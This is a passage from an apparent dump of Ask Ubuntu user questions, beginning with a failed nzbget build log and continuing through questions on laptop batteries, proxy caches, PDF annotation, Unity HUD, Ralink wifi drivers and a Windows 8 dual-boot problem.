int } ’ [ -wformat ] articledownloader.cpp:1032:160 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 5 has type ‘std : :vector < articleinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt binrpc.o -md -mp -mf `` .deps/binrpc.tpo '' -c -o binrpc.o binrpc.cpp ; \ then mv -f `` .deps/binrpc.tpo '' `` .deps/binrpc.po '' ; else rm -f `` .deps/binrpc.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt coloredfrontend.o -md -mp -mf `` .deps/coloredfrontend.tpo '' -c -o coloredfrontend.o coloredfrontend.cpp ; \ then mv -f `` .deps/coloredfrontend.tpo '' `` .deps/coloredfrontend.po '' ; else rm -f `` .deps/coloredfrontend.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt connection.o -md -mp -mf `` .deps/connection.tpo '' -c -o connection.o connection.cpp ; \ then mv -f `` .deps/connection.tpo '' `` .deps/connection.po '' ; else rm -f `` .deps/connection.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt decoder.o -md -mp -mf `` .deps/decoder.tpo '' -c -o decoder.o decoder.cpp ; \ then mv -f `` .deps/decoder.tpo '' `` .deps/decoder.po '' ; else rm -f `` .deps/decoder.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt diskstate.o -md -mp -mf `` .deps/diskstate.tpo '' -c -o diskstate.o diskstate.cpp ; \ then mv -f `` .deps/diskstate.tpo '' `` .deps/diskstate.po '' ; else rm -f `` .deps/diskstate.tpo '' ; exit 1 ; fi diskstate.cpp : in member function ‘void diskstate : :savenzblist ( downloadqueue* , file* ) ’ : diskstate.cpp:187:67 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < nzbinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp:209:65 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :vector < char* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp:224:61 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < nzbparameter* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp:232:45 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < message* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp : in member function ‘void diskstate : :savefilequeue ( downloadqueue* , filequeue* , file* ) ’ : diskstate.cpp:384:45 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < fileinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp : in member function ‘bool diskstate : :savefileinfo ( fileinfo* , const char* ) ’ : diskstate.cpp:470:57 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :vector < char* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp:476:59 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :vector < articleinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp : in member function ‘void diskstate : :savepostqueue ( downloadqueue* , file* ) ’ : diskstate.cpp:568:65 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < postinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp : in member function ‘void diskstate : :savehistory ( downloadqueue* , file* ) ’ : diskstate.cpp:799:67 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 3 has type ‘std : :deque < nzbinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] diskstate.cpp : in member function ‘bool diskstate : :discarddownloadqueue ( ) ’ : diskstate.cpp:948:42 : warning : format ‘ % s’ expects argument of type ‘char*’ , but argument 4 has type ‘char ( * ) [ 100 ] ’ [ -wformat ] diskstate.cpp:874:51 : warning : ignoring return value of ‘char* fgets ( char* , int , file* ) ’ , declared with attribute warn_unused_result [ -wunused-result ] diskstate.cpp:881:32 : warning : ignoring return value of ‘int fscanf ( file* , const char* , ... ) ’ , declared with attribute warn_unused_result [ -wunused-result ] diskstate.cpp:943:32 : warning : ignoring return value of ‘int fscanf ( file* , const char* , ... ) ’ , declared with attribute warn_unused_result [ -wunused-result ] diskstate.cpp : in member function ‘bool diskstate : :loadoldpostqueue ( downloadqueue* ) ’ : diskstate.cpp:652:51 : warning : ignoring return value of ‘char* fgets ( char* , int , file* ) ’ , declared with attribute warn_unused_result [ -wunused-result ] diskstate.cpp : in member function ‘bool diskstate : :loaddownloadqueue ( downloadqueue* ) ’ : diskstate.cpp:133:51 : warning : ignoring return value of ‘char* fgets ( char* , int , file* ) ’ , declared with attribute warn_unused_result [ -wunused-result ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt downloadinfo.o -md -mp -mf `` .deps/downloadinfo.tpo '' -c -o downloadinfo.o downloadinfo.cpp ; \ then mv -f `` .deps/downloadinfo.tpo '' `` .deps/downloadinfo.po '' ; else rm -f `` .deps/downloadinfo.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt frontend.o -md -mp -mf `` .deps/frontend.tpo '' -c -o frontend.o frontend.cpp ; \ then mv -f `` .deps/frontend.tpo '' `` .deps/frontend.po '' ; else rm -f `` .deps/frontend.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt log.o -md -mp -mf `` .deps/log.tpo '' -c -o log.o log.cpp ; \ then mv -f `` .deps/log.tpo '' `` .deps/log.po '' ; else rm -f `` .deps/log.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt loggablefrontend.o -md -mp -mf `` .deps/loggablefrontend.tpo '' -c -o loggablefrontend.o loggablefrontend.cpp ; \ then mv -f `` .deps/loggablefrontend.tpo '' `` .deps/loggablefrontend.po '' ; else rm -f `` .deps/loggablefrontend.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt ncursesfrontend.o -md -mp -mf `` .deps/ncursesfrontend.tpo '' -c -o ncursesfrontend.o ncursesfrontend.cpp ; \ then mv -f `` .deps/ncursesfrontend.tpo '' `` .deps/ncursesfrontend.po '' ; else rm -f `` .deps/ncursesfrontend.tpo '' ; exit 1 ; fi ncursesfrontend.cpp : in member function ‘void ncursesfrontend : :printfilequeue ( ) ’ : ncursesfrontend.cpp:796:82 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 5 has type ‘std : :deque < fileinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] ncursesfrontend.cpp:796:82 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 6 has type ‘std : :deque < fileinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] ncursesfrontend.cpp:796:82 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 5 has type ‘std : :deque < fileinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] ncursesfrontend.cpp:796:82 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 6 has type ‘std : :deque < fileinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] ncursesfrontend.cpp : in member function ‘void ncursesfrontend : :printgroupqueue ( ) ’ : ncursesfrontend.cpp:965:75 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 5 has type ‘std : :deque < groupinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] ncursesfrontend.cpp:965:75 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 5 has type ‘std : :deque < groupinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt nntpconnection.o -md -mp -mf `` .deps/nntpconnection.tpo '' -c -o nntpconnection.o nntpconnection.cpp ; \ then mv -f `` .deps/nntpconnection.tpo '' `` .deps/nntpconnection.po '' ; else rm -f `` .deps/nntpconnection.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt nzbfile.o -md -mp -mf `` .deps/nzbfile.tpo '' -c -o nzbfile.o nzbfile.cpp ; \ then mv -f `` .deps/nzbfile.tpo '' `` .deps/nzbfile.po '' ; else rm -f `` .deps/nzbfile.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt netaddress.o -md -mp -mf `` .deps/netaddress.tpo '' -c -o netaddress.o netaddress.cpp ; \ then mv -f `` .deps/netaddress.tpo '' `` .deps/netaddress.po '' ; else rm -f `` .deps/netaddress.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt newsserver.o -md -mp -mf `` .deps/newsserver.tpo '' -c -o newsserver.o newsserver.cpp ; \ then mv -f `` .deps/newsserver.tpo '' `` .deps/newsserver.po '' ; else rm -f `` .deps/newsserver.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt observer.o -md -mp -mf `` .deps/observer.tpo '' -c -o observer.o observer.cpp ; \ then mv -f `` .deps/observer.tpo '' `` .deps/observer.po '' ; else rm -f `` .deps/observer.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt options.o -md -mp -mf `` .deps/options.tpo '' -c -o options.o options.cpp ; \ then mv -f `` .deps/options.tpo '' `` .deps/options.po '' ; else rm -f `` .deps/options.tpo '' ; exit 1 ; fi options.cpp : in member function ‘void options : :initfilearg ( int , char** ) ’ : options.cpp:1221:36 : warning : ignoring return value of ‘char* getcwd ( char* , size_t ) ’ , declared with attribute warn_unused_result [ -wunused-result ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt parchecker.o -md -mp -mf `` .deps/parchecker.tpo '' -c -o parchecker.o parchecker.cpp ; \ then mv -f `` .deps/parchecker.tpo '' `` .deps/parchecker.po '' ; else rm -f `` .deps/parchecker.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt prepostprocessor.o -md -mp -mf `` .deps/prepostprocessor.tpo '' -c -o prepostprocessor.o prepostprocessor.cpp ; \ then mv -f `` .deps/prepostprocessor.tpo '' `` .deps/prepostprocessor.po '' ; else rm -f `` .deps/prepostprocessor.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt queuecoordinator.o -md -mp -mf `` .deps/queuecoordinator.tpo '' -c -o queuecoordinator.o queuecoordinator.cpp ; \ then mv -f `` .deps/queuecoordinator.tpo '' `` .deps/queuecoordinator.po '' ; else rm -f `` .deps/queuecoordinator.tpo '' ; exit 1 ; fi queuecoordinator.cpp : in member function ‘void queuecoordinator : :buildarticlefilename ( articledownloader* , fileinfo* , articleinfo* ) ’ : queuecoordinator.cpp:489:166 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 8 has type ‘std : :vector < articleinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] queuecoordinator.cpp:489:166 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 8 has type ‘std : :vector < articleinfo* > : :size_type { aka long unsigned int } ’ [ -wformat ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt queueeditor.o -md -mp -mf `` .deps/queueeditor.tpo '' -c -o queueeditor.o queueeditor.cpp ; \ then mv -f `` .deps/queueeditor.tpo '' `` .deps/queueeditor.po '' ; else rm -f `` .deps/queueeditor.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt remoteclient.o -md -mp -mf `` .deps/remoteclient.tpo '' -c -o remoteclient.o remoteclient.cpp ; \ then mv -f `` .deps/remoteclient.tpo '' `` .deps/remoteclient.po '' ; else rm -f `` .deps/remoteclient.tpo '' ; exit 1 ; fi in file included from /usr/include/string.h:642:0 , from remoteclient.cpp:36 : in function ‘char* strncat ( char* , const char* , size_t ) ’ , inlined from ‘bool remoteclient : :requestserverlist ( bool , bool ) ’ at remoteclient.cpp:480:59 : /usr/include/x86_64-linux-gnu/bits/string3.h:152:71 : warning : call to char* __builtin___strncat_chk ( char* , const char* , long unsigned int , long unsigned int ) might overflow destination buffer [ enabled by default ] in function ‘char* strncat ( char* , const char* , size_t ) ’ , inlined from ‘bool remoteclient : :requestserverlist ( bool , bool ) ’ at remoteclient.cpp:482:60 : /usr/include/x86_64-linux-gnu/bits/string3.h:152:71 : warning : call to char* __builtin___strncat_chk ( char* , const char* , long unsigned int , long unsigned int ) might overflow destination buffer [ enabled by default ] if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt remoteserver.o -md -mp -mf `` .deps/remoteserver.tpo '' -c -o remoteserver.o remoteserver.cpp ; \ then mv -f `` .deps/remoteserver.tpo '' `` .deps/remoteserver.po '' ; else rm -f `` .deps/remoteserver.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt scanner.o -md -mp -mf `` .deps/scanner.tpo '' -c -o scanner.o scanner.cpp ; \ then mv -f `` .deps/scanner.tpo '' `` .deps/scanner.po '' ; else rm -f `` .deps/scanner.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt scheduler.o -md -mp -mf `` .deps/scheduler.tpo '' -c -o scheduler.o scheduler.cpp ; \ then mv -f `` .deps/scheduler.tpo '' `` .deps/scheduler.po '' ; else rm -f `` .deps/scheduler.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt scriptcontroller.o -md -mp -mf `` .deps/scriptcontroller.tpo '' -c -o scriptcontroller.o scriptcontroller.cpp ; \ then mv -f `` .deps/scriptcontroller.tpo '' `` .deps/scriptcontroller.po '' ; else rm -f `` .deps/scriptcontroller.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt serverpool.o -md -mp -mf `` .deps/serverpool.tpo '' -c -o serverpool.o serverpool.cpp ; \ then mv -f `` .deps/serverpool.tpo '' `` .deps/serverpool.po '' ; else rm -f `` .deps/serverpool.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt svn_version.o -md -mp -mf `` .deps/svn_version.tpo '' -c -o svn_version.o svn_version.cpp ; \ then mv -f `` .deps/svn_version.tpo '' `` .deps/svn_version.po '' ; else rm -f `` .deps/svn_version.tpo '' ; exit 1 ; fi if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt tls.o -md -mp -mf `` .deps/tls.tpo '' -c -o tls.o tls.cpp ; \ then mv -f `` .deps/tls.tpo '' `` .deps/tls.po '' ; else rm -f `` .deps/tls.tpo '' ; exit 1 ; fi tls.cpp : in function ‘int tls_check_cert ( tls_t* , const char* , int , char** ) ’ : tls.cpp:911:5 : error : ‘stack’ was not declared in this scope tls.cpp:911:12 : error : ‘subj_alt_names’ was not declared in this scope tls.cpp:963:10 : error : expected primary-expression before ‘ ) ’ token tls.cpp:963:11 : error : expected ‘ ) ’ before ‘x509_get_ext_d2i’ tls.cpp:1564:1 : error : expected ‘ ) ’ at end of input tls.cpp:1564:1 : error : expected statement at end of input tls.cpp:1564:1 : error : expected ‘ } ’ at end of input make [ 1 ] : *** [ tls.o ] error 1 make [ 1 ] : leaving directory `/home/james/nzbget/nzbget-0.7.0' make : *** [ all ] error 2 here 's the output of sudo make install if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt tls.o -md -mp -mf `` .deps/tls.tpo '' -c -o tls.o tls.cpp ; \ then mv -f `` .deps/tls.tpo '' `` .deps/tls.po '' ; else rm -f `` .deps/tls.tpo '' ; exit 1 ; fi tls.cpp : in function ‘int tls_check_cert ( tls_t* , const char* , int , char** ) ’ : tls.cpp:911:5 : error : ‘stack’ was not declared in this scope tls.cpp:911:12 : error : ‘subj_alt_names’ was not declared in this scope tls.cpp:963:10 : error : expected primary-expression before ‘ ) ’ token tls.cpp:963:11 : error : expected ‘ ) ’ before ‘x509_get_ext_d2i’ tls.cpp:1564:1 : error : expected ‘ ) ’ at end of input tls.cpp:1564:1 : error : expected statement at end of input tls.cpp:1564:1 : error : expected ‘ } ’ at end of input make : *** [ tls.o ] error 1 i 'd appreciate any help .
111879	how can i kickstart a group advocating digital literacy with ubuntu ?	i 'm currently working in a cyber cafe in cameroon , africa . desktop penetration is very low here , so i wish to create a grassroots organisation with my mates to promote ict . where can i find materials and people interested in the project `` promote computer literacy and digital literacy with ubuntu '' ?
111881	laptop wo n't recognise battery	my laptop , running ubuntu 11.10 , does n't recognise that a battery is installed until i pull it out , then put it back in again . this presents a problem when i boot up from battery . why is this ?
111885	application to find duplicate mp3s	i 'm looking for a program to find duplicate mp3 files . the program should n't use md5 hashes but it should find similar file names . ( something like anti-twin for windows ) . any help is appreciated .
111892	how to add packages to a squid-deb-proxy cache ?	to save bandwidth and data on my internet plan , i have installed squid-deb-proxy on a desktop , and the client on it and a few other machines i 've got . however , based on the post that put me onto this , it sounds like if i take my laptop* to a different network and update it there , the downloaded updates will not be automatically copied back to the squid-deb-proxy server when i get back on my network . assuming that this is correct ( i will be testing later ) , is there a way i can stick these packages into the cache so i do n't have to download them one more time for other machines in the network ? * as noted in the comments , i could simply make the laptop the proxy server , but in my specific case , the laptop is actually 1 ) a vm that is not running all the time , 2 ) in a laptop that is not open all the time . as such , that solution , while a good one , does not work in my case .
111894	how can i annotate pdfs so notes are compatible with adobe reader for win/osx ?	i am looking for a tool which allows me to annotate pdfs in ubuntu and share the pdfs with annotations with people who use osx or windows . i can not assume that the others can or will install special software to read the annotations . i am therefore looking for software which allows me to make annotations in pdfs which are compatible with adobe reader . what good alternatives for ubuntu exist for this ?
111896	lost all the software downloaded because of upgrade	i downloaded the ubuntu 12.4 lts on a cd so do i upgrade ubuntu 11.10 , but after the upgrade i discovered that all the programs installed on the ubuntu 11.10 has been deleted . is it because of the upgrade . and how it has been restored programs ? ? ?
111903	can i change the filter options in the video lens ?	can i change the video options on the new dash menu ? to be more precise , on the video file find menu filters , can i add , remove or change what urls can be include ? if so how can i do ? for example if i want to change in the filters youtube shows to youtube comedy , how you do it ? ( i just installed myunity but from what i read and tested it wo n't fully work on unity 2d , however i can change video filters using that )
111904	how to disable hud in unity 2d ?	i am using ubuntustudio 12.04 with unity 2d . it delivers the hud . since i work with audio and graphic applications , exploring features ( filters , effects ) is important . so i would like to disable hud . how do i do this ?
111907	automatic reboot after power failure	i want a machine that loses power to automatically reboot when power is available . i 've looked around and have n't found a solution that works for 11.04 . purportedly at one point you could do : echo 'server_mode=1 ' > /proc/pmu/options however , my install does n't have a /proc/pmu folder . i assume this is still possible , where is the setting available ? edit : if this is n't possible from the os , is there a way to script these sorts of changes to bios or is this something that requires physical access to the machine on boot to manually edit the settings ? .
111918	can i use a usb drive to extend the hard drive space ?	i need more space on my hard drive and i have an unused 8gb usb stick . how can i use that as an extra hard drive ?
111919	what does this kernel panic means ?	i am using zenbook asus and after trying to install virtual box from ubuntu software center on ubuntu 11.10 unity , i faced with kernel panic and from that time from time to time i am facing with the same error ! i used wubi and have dual boot with windows home premium with ubuntu 11.10 ! i could also involve screen shots in case necessary ! ps : i did reinstall ubuntu once again and now this time it happened while downloading a codec : http : //tinypic.com/view.php ? pic=wwdjeo & s=5 i should say i am installing ubuntu via wubi ! any solution ?
111920	how do i get dolby advance audio virtual surround sound working ?	i have dolby surround sound speakers on my acer laptop . is there a way to get them working with dolby advance audio virtual surround sound ? in windows 7 it works and sounds amazing . how do i get this working in ubuntu 11.10
111921	sharing files stored on ntfs	is it possible to share files using ubuntu that are stored on an ntfs partition ? i am able to see the directory on other machines , but when i click to mount the folders i get the error saying the folder is unmountable .
111930	how can i increase volume beyond max in xubuntu ?	how can i increase the volume beyond the maximum in xubuntu , ( preferably without using anything from gnome ) ? something similar to what you have in gnome on ubuntu .
111932	how to change totem buffer size ?	i 've seen some suggestions by using gconf-editor but it does n't seem to work anymore . the option may have been removed ( see ) . is there another way to increase totem buffer size so when i see a video trough lan it does n't lag ?
111937	how do i turn off the external microphone ?	i am running ubuntu 11.10 with ardour doing track audio . i am having an issue in being unable to turn off the mic on the laptop . the system setting for ubuntu audio seemidly does not have option to change the mic input
111942	ralink wireless n wifi card not working	i have a wireless-n card from ralink . on the chip i can read the number `` rt3062f '' . i 'm running ubuntu 11.10 . on a fresh ubuntu install , the card is recognized , but does not detect any signals ( which is unlikely since it sits next to the router , and all my other device connect just fine ) . i tried installing the driver from the cd that came with the card but it wo n't compile . i also tried downloading a driver from the ralink website , but after installing , the card wo n't scan at all . here are some links to forum threads that i thought were headed in the right direction : ralink rt3060 driver not working http : //ubuntuforums.org/showthread.php ? t=1908542 http : //ubuntuforums.org/showthread.php ? t=1609086 diagnostics : morgan @ mohi : ~/downloads $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off morgan @ mohi : ~/downloads $ iwlist scanning lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 no scan results morgan @ mohi : ~/downloads $ sudo lsmod module size used by nls_utf8 12493 1 isofs 39549 1 bnep 17923 2 rfcomm 38408 0 bluetooth 148839 10 bnep , rfcomm binfmt_misc 17292 1 snd_intel8x0 33318 2 snd_ac97_codec 106082 1 snd_intel8x0 ac97_bus 12642 1 snd_ac97_codec snd_pcm 80435 2 snd_intel8x0 , snd_ac97_codec arc4 12473 2 snd_seq_midi 13132 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi rt2800pci 18340 0 rt2800lib 48909 1 rt2800pci crc_ccitt 12595 1 rt2800lib rt2x00pci 14202 1 rt2800pci rt2x00lib 48146 3 rt2800pci , rt2800lib , rt2x00pci joydev 17393 0 snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event mac80211 393421 3 rt2800lib , rt2x00pci , rt2x00lib snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq hid_microsoft 12728 0 cfg80211 172427 2 rt2x00lib , mac80211 usbhid 41905 0 hid 77367 2 hid_microsoft , usbhid i915 509519 3 snd 55902 11 snd_intel8x0 , snd_ac97_codec , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd eeprom_93cx6 12653 1 rt2800pci drm_kms_helper 32889 1 i915 drm 192194 4 i915 , drm_kms_helper snd_page_alloc 14115 2 snd_intel8x0 , snd_pcm i2c_algo_bit 13199 1 i915 video 18908 1 i915 ppdev 12849 0 psmouse 73673 0 serio_raw 12990 0 parport_pc 32114 1 lp 17455 0 parport 40930 3 ppdev , parport_pc , lp tg3 132972 0 floppy 60310 0 if i try to compile the driver from cd : morgan @ mohi : ~/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0 $ sudo make make -c tools ... /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1570:10 : error : ‘struct net_device’ has no member named ‘open’ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1571:10 : error : ‘struct net_device’ has no member named ‘stop’ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1572:10 : error : ‘struct net_device’ has no member named ‘hard_start_xmit’ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1573:10 : error : ‘struct net_device’ has no member named ‘do_ioctl’ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1579:11 : error : ‘struct net_device’ has no member named ‘get_stats’ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.c:1613:9 : error : ‘struct net_device’ has no member named ‘validate_addr’ make [ 2 ] : *** [ /home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux/../../os/linux/rt_linux.o ] error 1 make [ 1 ] : *** [ _module_/home/morgan/downloads/2009_0521_rt2860_linux_sta_v2.1.2.0/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-16-generic' make : *** [ linux ] error 2 after installing driver from website morgan @ mohi : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . ra0 ralink sta link quality:0 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 morgan @ mohi : ~ $ iwlist scanning lo interface does n't support scanning . eth0 interface does n't support scanning . ra0 interface does n't support scanning . many thanks !
111946	can not find grub - ubuntu/windows 8 dual-boot	hello ubuntu community , i find myself in an interesting situation . i have a dell inspiron 531 with windows vista . recently my brother decided it would be a good idea to overwrite vista with the windows 8 consumer preview . since we have had this pc for a very long time , we have long since lost the vista cd , and according to the windows 8 preview website you can not recover your previous os without it . i thought this would be a good opportunity to try out ubuntu ( since we obviously can not keep the preview as an os ) , but it appears that ubuntu 11.10 desktop is not compatible with win8 . ubuntu does n't run from the liveusb i made , instead it freezes on the loading screen and then disintegrates into black and white stripes . i blamed this failure on ubuntu not being compatible with win8 yet and tried to install ubuntu from the usb on a partition made from the remaining space on my hard drive - about 100gb . however the installer crashed while loading modules and told me i did n't have enough disk space . since then , i have not been able to load either 